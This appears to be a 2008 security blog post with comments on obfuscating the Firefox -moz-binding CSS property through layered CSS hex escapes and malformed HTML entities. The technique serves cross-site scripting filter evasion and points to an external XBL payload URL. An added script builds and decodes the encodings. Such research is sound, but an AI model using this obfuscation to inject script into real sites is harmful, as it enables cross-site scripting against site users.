Moz-binding XSS fun
Monday, 4 February 2008
CSS supports hex encoding within styles, as well as HTML entities, but did you know you can combine the two? I didn’t. To construct an attack similar to the one displayed below you first need to convert your CSS property name to hex, so -moz-binding becomes: \2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67. Notice there is no “x” prefix and no leading zeros like you would see in HTML entities or Unicode JavaScript escapes. (A CSS hex escape takes up to six hex digits, so an escape must not be followed directly by a literal hex digit; here every character is escaped, so each escape is terminated by the next backslash.) The link contains a Hackvertor URL to help you with the conversion.
You can do the same conversion on the value of the property, so the URL of the moz-binding payload, //businessinfo.co.uk/labs/xbl/xbl.xml#xss, becomes: \2f\2f\62\75\73\69\6e\65\73\73\69\6e\66\6f\2e\63\6f\2e\75\6b\2f\6c\61\62\73\2f\78\62\6c\2f\78\62\6c\2e\78\6d\6c\23\78\73\73
I hope you’re following so far; we can now take the property string and encode it further, crazy eh? Any part of the property can now be encoded with HTML entities. I went for the backslash, written as a malformed entity (&#x5c with no terminating semicolon), but you can experiment with different combinations. The property “\2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67” now becomes: &#x5c2d&#x5c6d&#x5c6f&#x5c7a&#x5c2d&#x5c62&#x5c69&#x5c6e&#x5c64&#x5c69&#x5c6e&#x5c67
Here is the final vector with a link to hackvertor for testing:-
The final vector
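As an added example (not code from the original post, and not Hackvertor’s), the script below reproduces both encoding layers described above for the property name and URL from the post, then decodes the result two ways: the way a conforming HTML parser reads a hex entity (it takes as many hex digits as it can, so &#x5c2d becomes U+5C2D and the property name turns into a run of CJK characters, which is what the Firefox 3 error console in the comments reports as an unknown property), and the way the vector needs to be read for it to work (only two hex digits consumed, which restores the backslashes for the CSS layer to unescape). That second, short decoder is an assumption modelling the Firefox 2 quirk mentioned in the comments, not documented browser behaviour.

```javascript
// Added example, not code from the original post. Layers the two encodings the
// post describes (CSS hex escapes, then HTML entities for the backslash) and
// decodes them back two ways to show what the trick depends on.

// CSS hex escape: "\" + hex code point, no "x" prefix, no zero padding.
// Escaping every character means each escape is followed by "\" rather than
// a literal hex digit, so the CSS parser cannot swallow the wrong digits.
function cssHexEscape(s) {
  return Array.from(s)
    .map(ch => '\\' + ch.codePointAt(0).toString(16))
    .join('');
}

// Undo a CSS escape: "\" + 1-6 hex digits, optionally followed by one
// whitespace character that the escape consumes (CSS 2.1, section 4.1.3).
function cssUnescape(s) {
  return s.replace(/\\([0-9a-fA-F]{1,6})[ \t\n]?/g,
    (_, hex) => String.fromCodePoint(parseInt(hex, 16)));
}

// Second layer: each backslash becomes the entity "&#x5c" with no ";".
function entityEncodeBackslashes(s) {
  return s.replace(/\\/g, '&#x5c');
}

// How an HTML parser actually treats "&#x5c2d": it takes as many hex digits
// as it can, so the entity decodes to U+5C2D, not to "\" followed by "2d".
function greedyEntityDecode(s) {
  return s.replace(/&#x([0-9a-fA-F]+);?/gi,
    (_, hex) => String.fromCodePoint(parseInt(hex, 16)));
}

// ASSUMPTION: a model of the Firefox 2 behaviour the comments describe, where
// only the first two hex digits after "&#x" are taken and the rest stay
// literal. The vector only works under a decoder like this; it is a model,
// not documented browser behaviour.
function shortEntityDecode(s) {
  return s.replace(/&#x([0-9a-fA-F]{2})/gi,
    (_, hex) => String.fromCodePoint(parseInt(hex, 16)));
}

// Build the doubly encoded property name and show what each decoder makes of it.
function buildVector(property, url) {
  const cssProp = cssHexEscape(property);
  const cssUrl = cssHexEscape(url);
  const doubly = entityEncodeBackslashes(cssProp);
  return {
    cssProp,
    cssUrl,
    doubly,
    // Conforming HTML decoding first: the property becomes CJK characters, so
    // the CSS engine sees an unknown property and drops the declaration.
    greedyThenCss: cssUnescape(greedyEntityDecode(doubly)),
    // Short decoding first: the backslashes come back, and the CSS escape
    // layer then yields the real property name.
    shortThenCss: cssUnescape(shortEntityDecode(doubly)),
  };
}

const demo = buildVector('-moz-binding', '//businessinfo.co.uk/labs/xbl/xbl.xml#xss');
console.log(demo.cssProp);       // \2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67
console.log(demo.doubly);        // &#x5c2d&#x5c6d&#x5c6f&#x5c7a&#x5c2d&#x5c62&#x5c69&#x5c6e&#x5c64&#x5c69&#x5c6e&#x5c67
console.log(demo.shortThenCss);  // -moz-binding
console.log(demo.greedyThenCss); // twelve CJK characters, no usable property name
```

Running it with Node prints the two intermediate encodings from the post and then the two decoding outcomes side by side; the greedy path is the one to expect from any parser that follows the HTML entity rules, which is why the vector is so sensitive to the exact browser version.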
No. 1 — February 4th, 2008 at 2:55 pm
Interesting, I quickly checked the method in Firefox 3 and it doesn’t seem to work. I haven’t checked it in Firefox 2 though.
No. 2 — February 4th, 2008 at 3:21 pm
Yep only tested in Firefox 2, although other tricks may be possible with FF3, I might have a go at that some other time 🙂
No. 3 — February 4th, 2008 at 3:24 pm
Another thing I forgot to mention is that NoScript silently disables moz-binding, so you have to disable NoScript to test the vector.
No. 4 — February 5th, 2008 at 4:07 am
error console in FF3:
Warning: Unknown property ‘尭屭屯屺尭屢屩屮層屩屮屧’. Declaration dropped.
Though I think FF3 enforces SOP on -moz-binding now anyway, right?
No. 5 — February 5th, 2008 at 9:26 am
@riahmatic
Yep that’s the expected behavior but FF2 seems to read the entities first and decode them but for some reason only takes into account the first few characters (maybe because it’s in a style).
I’ve not looked at FF3 yet much but I’m sure to have plenty of fun when I do 🙂 If FF3 does enforce SOP on moz-binding then that’s a good thing but I’ve not seen it mentioned anywhere.
No. 6 — February 6th, 2008 at 1:57 am
awesome! 🙂